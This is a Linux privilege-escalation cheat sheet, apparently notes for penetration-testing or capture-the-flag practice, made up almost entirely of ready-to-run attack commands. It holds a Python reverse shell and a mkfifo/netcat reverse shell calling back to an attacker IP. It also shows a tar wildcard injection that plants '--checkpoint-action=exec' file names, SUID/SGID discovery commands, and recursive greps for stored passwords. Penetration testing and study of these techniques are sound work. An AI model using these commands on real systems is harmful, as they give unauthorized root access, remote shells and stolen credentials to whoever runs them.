Linux Privilege Escalation

Get tty (text terminal)

Create another netcat listener as below

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell.

python -c 'import pty; pty.spawn("/bin/bash")'

or 

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm // give us access to term commands such as clear.

Optional if phase 2 not make the job done. Press CTRL+Z to put the shell in the background. Next, type this command in the same window: stty raw -echo;fg. This will bring your shell back to the foreground with a fully interactive experience.

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys

Gather Infos and spiking

history check users, architecture and services

su user login with another user

sudo -l check what files current user could run as root

cat /etc/crontab crontab -l cron is your friend

ls -l /bin/bash /bin/bash -p an easy win

sudo -u user command run command as other users

https://www.cyberciti.biz/open-source/command-line-hacks/linux-run-command-as-different-user/https://www.oreilly.com/library/view/linux-security-cookbook/0596003919/ch05s03.html

Exploiting SUID Executables(bash, binary)

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner
find / -perm /4000 -type f 2>/dev/null   # Using the chmod number
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID

Exploit tar wildcards

https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip>
4242 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Automatic tools and observe

./linpeas.sh | tee linlog.txt or pspy

Other Dirty Tricks

grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2>/dev/null

locate password | more

Expand knowledge and cheatsheet

• https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html

• https://payatu.com/guide-linux-privilege-escalation

• https://tryhackme.com/room/linuxprivesc

• https://gtfobins.github.io/